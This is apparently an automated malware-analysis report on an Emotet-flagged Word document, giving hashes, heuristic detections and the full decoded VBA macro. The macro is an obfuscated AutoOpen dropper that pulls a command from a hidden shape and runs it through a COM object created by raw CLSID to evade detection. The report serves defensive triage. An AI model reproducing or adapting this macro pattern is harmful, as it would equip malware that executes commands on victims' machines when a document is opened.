Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b33fe412dd45369f…

MALICIOUS

Office (OLE)

81.1 KB Created: 2018-11-26 19:43:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: c4ff2c8544ac826d8f47fa4589a05ff0 SHA-1: 94e8495a434e8ae195c8657c3490497f6f6457ce SHA-256: b33fe412dd45369f564a7c5535088cfe99fc37013f4f46eb857d61e2d9300c1e
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6826431-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826431-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
          End Select
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
   On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
          End Select
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
   On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5749 bytes
SHA-256: 741a5d0d0e0d2f2f26ad79d991a1e862a361b8149aa7ff831a277278eb5c7876
Detection
ClamAV: No threats found
Obfuscation or payload: likely
105 of 156 identifiers look randomly generated (e.g. 'KiQHBHzjqo') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NfhRrib"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      Select Case VLdwEK
         Case 15131936
            GCJFwzJmV = 312165642
            ZrCbQzsSd = CLng(327202709)
         Case 226308632
            JJjUjGL = Oct(tBOJWbzr)
            ZLpzoPW = kNwLsY
         Case 294776129
            czvPccj = CDate(MwXdtE)
            BAwElsbV = Int(306937547 * BvtOWA)
      End Select
   On Error Resume Next
      Select Case kMLDHOmm
         Case 127526074
            wckwbvXXl = 10628416
            aVzNNi = CLng(57406342)
         Case 295022822
            kpqLimBJ = Oct(zHZiznMB)
            uAilh = QJqMq
         Case 301667795
            iulJGlZN = CDate(uOsmuurY)
            BMaNsz = Int(334639252 * qvYvp)
      End Select
   On Error Resume Next
      Select Case cQVTLE
         Case 63613879
            FtwBZR = 103661861
            iurwmSUKv = CLng(251765696)
         Case 285218744
            ASJwwk = Oct(QQditjtBS)
            wzmrMi = oEjJwLXZN
         Case 324437860
            njzDoS = CDate(cFPzOsQBs)
            mEUnnNKtE = Int(269297437 * FFFjmf)
      End Select
   On Error Resume Next
      Select Case kZGcod
         Case 27149875
            MdLdj = 200518866
            ALBYmXoGX = CLng(225338729)
         Case 149182203
            zZIPFE = Oct(LFjQQSCS)
            liGuw = kwlHSpwS
         Case 228198655
            RPGfEOFYz = CDate(rRvkFk)
            jVobb = Int(115288969 * pMiwm)
      End Select
Set TvLTskZj = Shapes("zcYICaAl")
   On Error Resume Next
      Select Case bpLNaWYN
         Case 170293607
            btZLYAWnp = 122552508
            SiIkU = CLng(282292005)
         Case 302299572
            HoGtPz = Oct(QpnJvqrEw)
            FHzJjaXNh = HDdFj
         Case 201988746
            SCVzKLdkj = CDate(fWOaiLqOj)
            IXOifhqnM = Int(77471184 * dRuYBatv)
      End Select
   On Error Resume Next
      Select Case siRVEHKw
         Case 328682984
            LnimNzKiZ = 339408030
            cAift = CLng(330037178)
         Case 94407295
            zuQvYZkD = Oct(iUjhFh)
            hlhjKc = mtfQh
         Case 257934290
            LJwJwCvr = CDate(NdtrD)
            TYWTS = Int(334976911 * QicXm)
      End Select
   On Error Resume Next
      Select Case UzWMI
         Case 50940566
            jjRbbU = 78212833
            zhmufTlf = CLng(325890287)
         Case 141247575
            kisAiR = Oct(RBKJXcw)
            uLFKOFA = UoLvP
         Case 283886450
            TZrpXjqf = CDate(KzCKVoJK)
            GYaZmHNjX = Int(161537658 * SVOaTq)
      End Select
   On Error Resume Next
      Select Case IcOnZTZf
         Case 12214148
            JplwhAHp = 153678308
            LDbAw = CLng(208601453)
         Case 84029814
            jDwaVY = Oct(YOwYAO)
            hliBDQaJM = TXVFBNrt
         Case 42579489
            wwliTN = CDate(IlLRXuSV)
            VucvoWrMG = Int(327251806 * GXAEi)
      End Select
KiQHBHzjqo = "" + JDQiSKjY + QpfUDRk + TvLTskZj.TextFrame.TextRange.Text + hbPRpN + ZHtNUqD + cMktjA
   On Error Resume Next
      Select Case jZBKIi
         Case 8276858
            NPJmflS = 186192330
            mTlTr = CLng(226914952)
         Case 207270491
            rduGAzLb = Oct(vwRVTUizb)
            KbwCQE = iJcqrr
         Case 146621912
            RAGQNSw = CDate(jpTKl)
            wDUQRU = Int(66224729 * adBjOBzFD)
      End Select
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
   On Error Resume Next
      Select Case zZIPYUA
         Case 541397
            QSuNCVO = 233435738
            saiREHjb = CLng(56873109)
         Case 97211930
            kZMVu = Oct(OznORN)
            QEYKIQMp = ipppfVBj
         Case 322489168
            lwqqFY = CDate(lGOvRa)
            wAziZT = Int(291729254 * OEvWj)
      End Select
   On Error Resume Next
      Select Case hiswVivQG
         Case 233192990
            liqwiwm = 163074422
            tWpMw = CLng(43829233)
         Case 176409652
            FkvKi = Oct(HmmdPUW)
            mzmucNAMd = DZzLojCOH
         Case 278426237
            VnQHJi = CDate(sTWElC)
            sZCiNEsH = Int(338007662 * EWwzG)
      End Select
Const iflKAuswi = 0
   On Error Resume Next
      Select Case zmwZRf
         Case 20356153
            iVqvDwlRB = 181861349
            hjWGrmK = CLng(75256157)
         Case 271310302
            SwwLptN = Oct(dPnXl)
            CjONpTOBY = NkdjH
         Case 251644728
            UNdLX = CDate(jNCYMXMkK)
            jDKYwVWGR = Int(171246929 * wFQhzrITJ)
      End Select
   On Error Resume Next
      Select Case olsGnSksb
         Case 202738348
            LvMtrlDkD = 127267149
            GnvRMapCt = CLng(272692696)
         Case 232593572
            LjtBnSiv = Oct(iDbZV)
            LaCncj = fEKWFJDZ
         Case 245228971
            cGBKw = CDate(QRYYwXkT)
            rMdbqCGIX = Int(22600673 * qQNVrdzz)
      End Select
FqTTzQNYu.Run! KiQHBHzjqo, iflKAuswi
   On Error Resume Next
      Select Case zURlkio
         Case 294353168
            ADowIECwu = 31374145
            TNPQTGj = CLng(206168440)
         Case 283664432
            SlNBFzjER = Oct(hBFiXOpF)
            sVZAZL = EBRdzIBB
         Case 223332389
            bwCHSs = CDate(PtRHhtF)
            dOwTtl = Int(259411127 * VsinnqYAE)
      End Select
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.